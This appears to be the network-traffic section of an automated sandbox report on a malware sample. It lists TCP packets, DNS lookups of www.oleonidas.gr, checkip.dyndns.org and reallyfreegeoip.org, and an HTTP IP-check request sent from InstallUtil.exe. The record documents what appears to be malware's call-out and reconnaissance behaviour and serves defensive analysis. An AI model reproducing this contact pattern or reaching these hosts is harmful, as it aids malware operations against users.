                                                              Nov 11, 2024 05:17:07.868391991 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.869271040 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.869324923 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.869688034 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.869750023 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.870253086 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.870311022 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.870984077 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.871058941 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.871824026 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.871882915 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.872616053 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.872668982 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.873121023 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.873169899 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.873823881 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.873876095 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.874336004 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.874389887 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.875272989 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.875340939 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.875643969 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.875694990 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.876506090 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.876558065 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.877233982 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.877289057 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.877927065 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.877978086 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.878460884 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.878509998 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.879262924 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.879318953 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.879897118 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.879946947 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.880532026 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.880584002 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.881133080 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.881181002 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.882051945 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.882095098 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.882819891 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.882869959 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.883553028 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.883598089 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.883893013 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.883943081 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.885488987 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.885545969 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.885674953 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.885731936 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.886194944 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.886240959 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.886948109 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.887006044 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.887327909 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.887381077 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.888097048 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.888143063 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.888827085 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.888881922 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.889254093 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.889302969 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.890270948 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.890324116 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.890847921 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.890902042 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.891364098 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.891422033 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.892010927 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.892055035 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.892728090 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.892775059 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.898511887 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.898576975 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.926548958 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.926620960 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.927022934 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.927083015 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.927886009 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.927936077 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.928456068 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.928514004 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.929156065 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.929220915 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.937458992 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.937582016 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.947040081 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.947109938 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.947632074 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.947680950 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.948252916 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.948301077 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.948621035 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.948667049 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.949330091 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.949385881 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.949979067 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.950028896 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.950155020 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.950205088 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.950460911 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.950508118 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.950519085 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.950536966 CET44349719185.78.221.73192.168.2.5
                                                              Nov 11, 2024 05:17:07.950578928 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.953258038 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:07.975899935 CET49719443192.168.2.5185.78.221.73
                                                              Nov 11, 2024 05:17:09.220454931 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:09.225342035 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:09.225404024 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:09.225678921 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:09.230485916 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:09.892749071 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:09.896322966 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:09.901122093 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:10.105959892 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:10.142754078 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.142803907 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:10.142869949 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.147030115 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.147046089 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:10.149548054 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:10.573556900 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:10.573800087 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.584829092 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.584847927 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:10.585144043 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:10.636885881 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.943344116 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:10.987334013 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.044776917 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.044835091 CET44349725188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.052910089 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.074364901 CET49725443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.157618046 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.162523985 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:11.367885113 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:11.370795965 CET49730443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.370836973 CET44349730188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.370904922 CET49730443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.371540070 CET49730443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.371555090 CET44349730188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.415201902 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.798888922 CET44349730188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.807611942 CET49730443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.807645082 CET44349730188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.910037994 CET44349730188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.910106897 CET44349730188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:11.910154104 CET49730443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.910593987 CET49730443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:11.950649977 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.952064037 CET4973180192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.955984116 CET8049722132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:11.956037045 CET4972280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.956834078 CET8049731132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:11.956892967 CET4973180192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.957041025 CET4973180192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:11.961757898 CET8049731132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:12.614900112 CET8049731132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:12.636470079 CET49734443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:12.636501074 CET44349734188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:12.639029026 CET49734443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:12.639399052 CET49734443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:12.639414072 CET44349734188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:12.666976929 CET4973180192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:13.083976030 CET44349734188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:13.092484951 CET49734443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:13.092510939 CET44349734188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:13.504844904 CET44349734188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:13.504913092 CET44349734188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:13.505053997 CET49734443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:13.505486965 CET49734443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:13.509790897 CET4974080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:13.514657974 CET8049740132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:13.514749050 CET4974080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:13.514837027 CET4974080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:13.519546032 CET8049740132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:14.172065020 CET8049740132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:14.173099041 CET49746443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:14.173127890 CET44349746188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:14.173198938 CET49746443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:14.173407078 CET49746443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:14.173422098 CET44349746188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:14.212073088 CET4974080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:14.601675034 CET44349746188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:14.604697943 CET49746443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:14.604716063 CET44349746188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:14.709831953 CET44349746188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:14.709897041 CET44349746188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:14.710108995 CET49746443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:14.710349083 CET49746443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:14.713784933 CET4974080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:14.714637041 CET4975280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:14.718977928 CET8049740132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:14.719033957 CET4974080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:14.719422102 CET8049752132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:14.719629049 CET4975280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:14.719708920 CET4975280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:14.725233078 CET8049752132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:15.378827095 CET8049752132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:15.380247116 CET49758443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:15.380274057 CET44349758188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:15.380352020 CET49758443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:15.380588055 CET49758443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:15.380603075 CET44349758188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:15.430843115 CET4975280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:15.814749002 CET44349758188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:15.816293955 CET49758443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:15.816320896 CET44349758188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:15.949381113 CET44349758188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:15.949434042 CET44349758188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:15.949484110 CET49758443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:15.949817896 CET49758443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:15.953154087 CET4975280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:15.953708887 CET4976480192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:15.958220959 CET8049752132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:15.958314896 CET4975280192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:15.958477974 CET8049764132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:15.958544970 CET4976480192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:15.958626032 CET4976480192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:15.963386059 CET8049764132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:16.616981983 CET8049764132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:16.618201971 CET49770443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:16.618227959 CET44349770188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:16.618288994 CET49770443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:16.618856907 CET49770443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:16.618870974 CET44349770188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:16.665205002 CET4976480192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:17.045336962 CET44349770188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:17.046969891 CET49770443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:17.046991110 CET44349770188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:17.151176929 CET44349770188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:17.151232004 CET44349770188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:17.151279926 CET49770443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:17.151669979 CET49770443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:17.154795885 CET4976480192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:17.156091928 CET4977680192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:17.160159111 CET8049764132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:17.160219908 CET4976480192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:17.160875082 CET8049776132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:17.160947084 CET4977680192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:17.161007881 CET4977680192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:17.165709972 CET8049776132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:17.818900108 CET8049776132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:17.823074102 CET49782443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:17.823102951 CET44349782188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:17.823174000 CET49782443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:17.823411942 CET49782443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:17.823426008 CET44349782188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:17.868925095 CET4977680192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:18.249470949 CET44349782188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:18.250874043 CET49782443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:18.250900030 CET44349782188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:18.353841066 CET44349782188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:18.353902102 CET44349782188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:18.353959084 CET49782443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:18.354362965 CET49782443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:18.358398914 CET4977680192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:18.359009981 CET4978880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:18.363619089 CET8049776132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:18.363806963 CET8049788132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:18.363861084 CET4977680192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:18.363883972 CET4978880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:18.364017963 CET4978880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:18.368783951 CET8049788132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:19.022644043 CET8049788132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:17:19.023895979 CET49794443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:19.023924112 CET44349794188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:19.023996115 CET49794443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:19.024236917 CET49794443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:19.024249077 CET44349794188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:19.071531057 CET4978880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:17:19.453027010 CET44349794188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:19.455867052 CET49794443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:19.455885887 CET44349794188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:19.564029932 CET44349794188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:19.564096928 CET44349794188.114.96.3192.168.2.5
                                                              Nov 11, 2024 05:17:19.564143896 CET49794443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:17:19.564690113 CET49794443192.168.2.5188.114.96.3
                                                              Nov 11, 2024 05:18:06.440455914 CET8049710132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:18:06.440593004 CET4971080192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:18:12.013891935 CET8049718132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:18:12.013950109 CET8049718132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:18:12.013967991 CET8049718132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:18:12.014008999 CET4971880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:18:12.014031887 CET4971880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:18:12.243058920 CET8049718132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:18:12.243200064 CET4971880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:18:17.736685038 CET8049731132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:18:17.736749887 CET4973180192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:18:24.146095037 CET8049788132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:18:24.146193027 CET4978880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:18:46.286725044 CET4971880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:18:46.291929960 CET8049718132.226.247.73192.168.2.5
                                                              Nov 11, 2024 05:18:59.025590897 CET4978880192.168.2.5132.226.247.73
                                                              Nov 11, 2024 05:18:59.030539989 CET8049788132.226.247.73192.168.2.5

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Nov 11, 2024 05:16:51.993442059 CET6480153192.168.2.51.1.1.1
                                                              Nov 11, 2024 05:16:52.367841005 CET53648011.1.1.1192.168.2.5
                                                              Nov 11, 2024 05:16:55.391479015 CET5892353192.168.2.51.1.1.1
                                                              Nov 11, 2024 05:16:55.398777962 CET53589231.1.1.1192.168.2.5
                                                              Nov 11, 2024 05:16:56.333863974 CET5129553192.168.2.51.1.1.1
                                                              Nov 11, 2024 05:16:56.340763092 CET53512951.1.1.1192.168.2.5

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Nov 11, 2024 05:16:51.993442059 CET192.168.2.51.1.1.10x16e0Standard query (0)www.oleonidas.grA (IP address)IN (0x0001)false
                                                              Nov 11, 2024 05:16:55.391479015 CET192.168.2.51.1.1.10xd207Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                              Nov 11, 2024 05:16:56.333863974 CET192.168.2.51.1.1.10x7f18Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Nov 11, 2024 05:16:52.367841005 CET1.1.1.1192.168.2.50x16e0No error (0)www.oleonidas.groleonidas.grCNAME (Canonical name)IN (0x0001)false
                                                              Nov 11, 2024 05:16:52.367841005 CET1.1.1.1192.168.2.50x16e0No error (0)oleonidas.gr185.78.221.73A (IP address)IN (0x0001)false
                                                              Nov 11, 2024 05:16:55.398777962 CET1.1.1.1192.168.2.50xd207No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                              Nov 11, 2024 05:16:55.398777962 CET1.1.1.1192.168.2.50xd207No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                              Nov 11, 2024 05:16:55.398777962 CET1.1.1.1192.168.2.50xd207No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                              Nov 11, 2024 05:16:55.398777962 CET1.1.1.1192.168.2.50xd207No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                              Nov 11, 2024 05:16:55.398777962 CET1.1.1.1192.168.2.50xd207No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                              Nov 11, 2024 05:16:55.398777962 CET1.1.1.1192.168.2.50xd207No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                              Nov 11, 2024 05:16:56.340763092 CET1.1.1.1192.168.2.50x7f18No error (0)reallyfreegeoip.org188.114.96.3A (IP address)IN (0x0001)false
                                                              Nov 11, 2024 05:16:56.340763092 CET1.1.1.1192.168.2.50x7f18No error (0)reallyfreegeoip.org188.114.97.3A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • www.oleonidas.gr
                                                              • reallyfreegeoip.org
                                                              • checkip.dyndns.org

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.549705132.226.247.73801436C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                              TimestampBytes transferredDirectionData
                                                              Nov 11, 2024 05:16:55.423974991 CET151OUTGET / HTTP/1.1
                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                              Host: checkip.dyndns.org
                                                              Connection: Keep-Alive
                                                              Nov 11, 2024 05:16:56.081047058 CET322INHTTP/1.1 200 OK
                                                              Date: Mon, 11 Nov 2024 04:16:55 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 105
                                                              Connection: keep-alive
                                                              Cache-Control: no-cache
